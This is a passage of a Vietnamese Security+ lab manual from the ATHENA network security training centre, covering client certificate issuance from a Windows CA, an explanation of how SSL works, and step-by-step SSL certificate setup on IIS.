  87. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Sau khi đã đăng ký xong thì trên CA server sẽ xác nhận cung cấp Certificate.Sau đó từ client vào lại > chọn View the status of a pending certificate request > Client Authentication Certificate (Tuesday August 29 2006 5:20:48 PM) ,Click Install this Cerificate Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 78
  88. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click Yes Chương trình thông báo Certificate đã được Install Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 79
  89. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Sau khi install hòan tất quay trở lại trang chọn Download a CA certificate, certificate chain, or CRL Download CA certificate Ngoài Desktop có 1 file certnew.cer là file mà chúng ta vừa đăng ký trên CA Server Để kiểm tra lại Certificate đã có hiệu lực chưa ta sẽ vào CA Server kiểm tra Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 80
  90. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click Start Programs Administrative Tools Click Certificate Authority Click Issue Certificates ta thấy Certifiacte User Test đã đươc cấp và Certifiacte User Test đã có hiệu lực. Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 81
  91. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tài liệu hướng dẫn thực tập Security+.Trung tâm đào tạo An Ninh Mạng ATHENA 82
  92. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Bài 11: SSL (Secure Sockets Layer) 1. ỨNG DỤNG SSL MỘT SỐ KHÁI NIÊM: SSL LÀ GÌ? SSL là giao thức đa mục đích được thiết kế để tạo ra các giao tiếp giữa hai chương trình ứng dụng trên một cổng định trước (socket 443) nhằm mã hoá toàn bộ thông tin đi/đến, mà ngày nay được sử dụng rộng rãi cho giao dịch điện tử như truyền số hiệu thẻ tín dụng, mật khẩu, số bí mật cá nhân (PIN) trên Internet. Giao thức SSL được hình thành và phát triển đầu tiên năm 1994 bởi nhóm nghiên cứu Netscape dẫn dắt bởi Elgammal và ngày nay đã trở thành chuẩn bảo mật thực hành trên mạng Internet. Phiên bản SSL hiện nay là 3.0 và vẫn đang tiếp tục được bổ sung và hoàn thiện. Tương tự như SSL, một giao thức khác có tên là PCT - Private Communication Technology được đề xướng bởi Microsoft hiện nay cũng được sử dụng rộng rãi trong các mạng máy tính chạy trên hệ điều hành Windows NT. Ngoài ra, một chuẩn của IETF (Internet Engineering Task Force) có tên là TLS (Transport Layer Security) dựa trên SSL cũng được hình thành và xuất bản dưới khuôn khổ nghiên cứu của IETF Internet Draft được tích hợp và hỗ trợ trong sản phẩm của Netscape. TCP/IP Layer Protocol Application Layer HTTP, Telnet, FTP, Secure Socket Layer SSL Transport Layer TCP Internet Layer IP SSL và TCP/IP Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 81
  93. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN GIAO THỨC SSL LÀM VIỆC NHƯ THẾ NÀO? Điểm cơ bản của SSL được thiết kế độc lập với tầng ứng dụng để đảm bảo tính bí mật, an toàn và chống giả mạo luồng thông tin qua Internet giữa hai ứng dụng bất kỳ, thí dụ như webserver và các trình duyệt khách (browsers), do đó được sử dụng rộng rãi trong nhiều ứng dụng khác nhau trên môi trường Internet. Toàn bộ cơ chế hoạt động và hệ thống thuật toán mã hoá sử dụng trong SSL được phổ biến công khai, trừ khoá chia xẻ tạm thời (session key) được sinh ra tại thời điểm trao đổi giữa hai ứng dụng là tạo ngẫu nhiên và bí mật đối với người quan sát trên mạng máy tính. Ngoài ra, giao thức SSL còn đỏi hỏi ứng dụng chủ phải được chứng thực bởi một đối tượng lớp thứ ba (CA) thông qua giấy chứng thực điện tử (digital certificate) dựa trên mật mã công khai (thí dụ RSA). Sau đây ta xem xét một cách khái quát cơ chế hoạt động của SSL để phân tích cấp độ an toàn của nó và các khả năng áp dụng trong các ứng dụng nhạy cảm, đặc biệt là các ứng dụng về thương mại và thanh toán điện tử Giao thức SSL dựa trên hai nhóm con giao thức là giao thức “bắt tay” (handshake protocol) và giao thức “bản ghi” (record protocol). Giao thức bắt tay xác định các tham số giao dịch giữa hai đối tượng có nhu cầu trao đổi thông tin hoặc dữ liệu, còn giao thức bản ghi xác định khuôn dạng cho tiến hành mã hoá và truyền tin hai chiều giữa hai đối tượng đó. Khi hai ứng dụng máy tính, thí dụ giữa một trình duyệt web và máy chủ web, làm việc với nhau, máy chủ và máy khách sẽ trao đổi “lời chào” (hellos) dưới dạng các thông điệp cho nhau với xuất phát đầu tiên chủ động từ máy chủ, đồng thời xác định các chuẩn về thuật toán mã hoá và nén số liệu có thể được áp dụng giữa hai ứng dụng. Ngoài ra, các ứng dụng còn trao đổi “số nhận dạng/khoá theo phiên” (session ID, session key) duy nhất cho lần làm việc đó. Sau đó ứng dụng khách (trình duyệt) yêu cầu có chứng thực điện tử (digital certificate) xác thực của ứng dụng chủ (web server). Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 82
  94. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Chứng thực điện tử thường được xác nhận rộng rãi bởi một cơ quan trung gian (là CA -Certificate Authority) như RSA Data Sercurity hay VeriSign Inc., một dạng tổ chức độc lập, trung lập và có uy tín. Các tổ chức này cung cấp dịch vụ “xác nhận” số nhận dạng của một công ty và phát hành chứng chỉ duy nhất cho công ty đó như là bằng chứng nhận dạng (identity) cho các giao dịch trên mạng, ở đây là các máy chủ webserver. Sau khi kiểm tra chứng chỉ điện tử của máy chủ (sử dụng thuật toán mật mã công khai, như RSA tại trình máy trạm), ứng dụng máy trạm sử dụng các thông tin trong chứng chỉ điện tử để mã hoá thông điệp gửi lại máy chủ mà chỉ có máy chủ đó có thể giải mã. Trên cơ sở đó, hai ứng dụng trao đổi khoá chính (master key) - khoá bí mật hay khoá đối xứng - để làm cơ sở cho việc mã hoá luồng thông tin/dữ liệu qua lại giữa hai ứng dụng chủ khách. Toàn bộ cấp độ bảo mật và an toàn của thông tin/dữ liệu phụ thuộc vào một số tham số: (i) số nhận dạng theo phiên làm việc ngẫu nhiên; (ii) cấp độ bảo mật của các thuật toán bảo mật áp dụng cho SSL; và (iii) độ dài của khoá chính (key length) sử dụng cho lược đồ mã hoá thông tin. Các thuật toán mã hoá và xác thực của SSL được sử dụng bao gồm (phiên bản 3.0): 1. DES - chuẩn mã hoá dữ liệu (ra đời năm 1977), phát minh và sử dụng của chính phủ Mỹ 2. DSA - thuật toán chữ ký điện tử, chuẩn xác thực điện tử), phát minh và sử dụng của chính phủ Mỹ 3. KEA - thuật toán trao đổi khoá), phát minh và sử dụng của chính phủ Mỹ 4. MD5 - thuật toán tạo giá trị “băm” (message digest), phát minh bởi Rivest; Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 83
  95. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN 5. RC2, RC4 - mã hoá Rivest, phát triển bởi công ty RSA Data Security; 6. RSA - thuật toán khoá công khai, cho mã hoá va xác thực, phát triển bởi Rivest, Shamir và Adleman; 7. RSA key exchange - thuật toán trao đổi khoá cho SSL dựa trên thuật toán RSA; 8. SHA-1 - thuật toán hàm băm an toàn, phát triển và sử dụng bởi chính phủ Mỹ 9. SKIPJACK - thuật toán khoá đối xứng phân loại được thực hiện trong phần cứng Fortezza, sử dụng bởi chính phủ Mỹ 10. Triple-DES - mã hoá DES ba lần. Cơ sở lý thuyết và cơ chế hoạt động của các thuật toán sử dụng về bảo mật bên trên hiện nay là phổ biến rộng rãi và công khai, trừ các giải pháp thực hiện trong ứng dụng thực hành vào trong các sản phẩm bảo mật (phần cứng, phần dẻo, phần mềm). GIAO THỨC SSL SSL Message Các bước thực hiện để thiết lập kết nối SSL giữa client và server: 1. Khi browser muốn thiết lập một kết nối SSL với server thì gởi một URL bắt đầu bằng https thay vì http. 2. Browser sẽ tự động gởi đến server một số thông tin cần thiết để tạo kết nối SSL với server như phiên bản SSL, bộ mã . Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 84
  96. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN 3. Server sẽ tự động trả lời bằng cách gởi cho browser một digital certificate của site cùng với một số thông tin như phiên bản SSL sử dụng, bộ mã . 4. Browser sẽ kiểm tra thông tin chứa trong certificate của server : a. Thời gian sử dụng của certificate. b. CA đã ký vào certificate có được tin cậy hay không. c. Kiểm tra public key của CA đã tạo ra chữ ký điện tử. d. Kiểm tra domain name của certificate server có trùng với domain name của server không. 5. Nếu việc định danh server thành công thì borwser sẽ phát sinh ra một khoá duy nhất gọi là “session key” để mã hoá tất cả giao tiếp sau này. 6. Browser mã hoá session key bằng public key của server và gởi đến cho server. 7. Server giải mã dữ liệu nhận được bằng private key (lúc này thì chỉ có client và server biết session key) 8. Browser gởi một thông điệp đến server để thông báo những thông điệp sau này sẽ được mã hoá bằng session key. 9. Sever gởi một thông điệp đến client để thông báo những thông điệp sau này sẽ được mã hoá bằng session key. 10. Phiên làm việc SSL được thành lập, SSL sẽ sử dụng phương pháp mã hoá secret key để mã hoá và giải mã dữ liệu trong qúa trình giao tiếp. 11. Khi phiên làm việc kết thúc thì session key bị huỷ bỏ. Kiến trúc phân tầng SSL Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 85
  97. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Kiến trúc phân tầng SSL/TCP Quá trình bắt tay của SSL sử dụng ba giao thức: SSL Handshake protocol: xác định một phiên làm việc ( thống nhất session key, ) SSL Chage Cipher Spec: thống nhất giải thuật mã hoádùng trong phiên làm việc. SSL Alert Protocol: thông báo lổi. Dữ liệu, lệnh của các giao thức này được đóng gói và truyền xuống lớp SSL Record Protocol. SSL Record Protocol được truyền xuống lớp dưới TCP, IP. Dữ liệu được phân mảnh, mã hoá, tính digest và truyền xuống cho lớp TCP để gởi đi. Độ tin cậy của SSL: SSL 40bit và SSL 128 bit SSL cung cấp hai mức độ tin cậy: 40 bit và 128 bit. SSL 128 bit và SSL 40 bit ý nói độ dài của session key dùng để mã hoá dữ liệu sau khi đã định danh và thiết lập session key bằng giải thuật public key (RSA hoặc Dellfi- Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 86
  98. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Hellman). Độ dài của khoá session key càng lớn thì độ bảo mật càng tăng. Hiện nay SSL 128 bit có độ tin cậy lớn nhất. Theo RSA phải mất hằng tỉ năm mới có thể giải mã được bằng các kỷ thuật hiện nay. Các transactions sử dụng SSL 40bit hoặc 128 bit tuỳ thuộc vào khả năng của từng browser. Để có được SSL Certificate 128bit thì ta phải tạo private key 1024 bit. Hoạt động của SSL 2.0 Kết nối từ client đến server được thực hiện bằng giao thức HTTPS (HTTP+SSL). Server ký khoá công khai (public key) bằng khoá bí mật (private key) của mình và gửi cho client. Client dùng khoá công khai của server để xác nhận đúng server đang liên lạc. Client kiểm tra xem có CA nào đã ký vào khoá. Nếu không client sẽ hỏi người dùng xem có nên tin tưởng vào server không. Client sinh ra một khoá bất đối xứng (asymmetric key) cho phiên giao dịch, khoá này được mã hoá bằng khoá công khai của máy chủ và gửi ngược lại. Khoá này cũng sẽ được dùng để mã hoá tất cả các thông tin sau này. SSL 3.0 bổ sung thêm cho SSL 2.0 bằng cách hỗ trợ cho chứng thực máy khách (client certificate), giúp server có thể nhận diện ngược lại client. SSL 3.0 hoạt động như SSL 2.0 , nhưng sau khi client đã xác thực server, đến lượt server sẽ kiểm tra ngược lại client. 4.1. Cấu hình SSL Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 87
  99. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click Start Programs Administrative Tools Click Internet Information Services ( IIS ). Click phải vào website cần thiết lập SSL Click Properties Click Directory Security Tab Click Server Certifcate Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 88
  100. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Màn hình Welcome to the Web Server Certificate Wizard xuất hiện,Click Next Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 89
  101. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Trên trang Server Certificate Chọn Create a new Certificate ,sau đó Click Next Note: Tại đây bạn có thể Import Certificate có sẵn thì bạn phải làm các bước sau: Click Import certificate from a.pfx file Click Next Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 90
  102. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Trong màn hình Import Certificate, Click Browser đến nơi chứa Certificate đó,sau đó Click Next Và nhập Password Click Next và tiếp tục bước Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 91
  103. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Trong Delayed or Immediate Request Click Prepare the request now, but send it later Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 92
  104. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Màn hình Name and Security Setting Name :Web test. Sau đó Click Next Hoàn thành các thông số sau : Organization : athena Organizational unit : vt04c1 Click Next Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 93
  105. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Trên màn hình Your Site’s Common Name nhập Domain Name của mình: www.vt04c1.com Trên Geographical Information Page nhập các thông số sau: Country/Region : VietNam State/Province : vn City/locality : hcm Click Next Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 94
  106. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Trên Certificate Request File Name Click Browser chọn đường dẫn nơi lưu trữ mặc định là: \certreq.txt. Click Next Click Next Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 95
  107. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click Finish hoàn thành quá trình Configuration SSL Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 96
  108. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Tạo request Trên Web Server ta sẽ tạo Request đến CA Server Mở trình duyệt Web Internet Expolorer Click Request a Certifcate Click Advance Certificate Request Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 97
  109. Simpo PDF Merge and Split Unregistered Version - 02 Bis Dinh Tien Hoang Street, Dakao Ward, District 1, HCMC – Tel: (848) 3824 4041 – 090 78 79 477 E-mail: training@athenavn.com – URL: WWW.ATHENA.EDU.VN Click Submit a Certfiate request by using a base . Sau đó mở file C:\certreq.txt Tài liệu hướng dẫn thực tập Security+ , Trung tâm đào tạo An Ninh Mạng ATHENA 98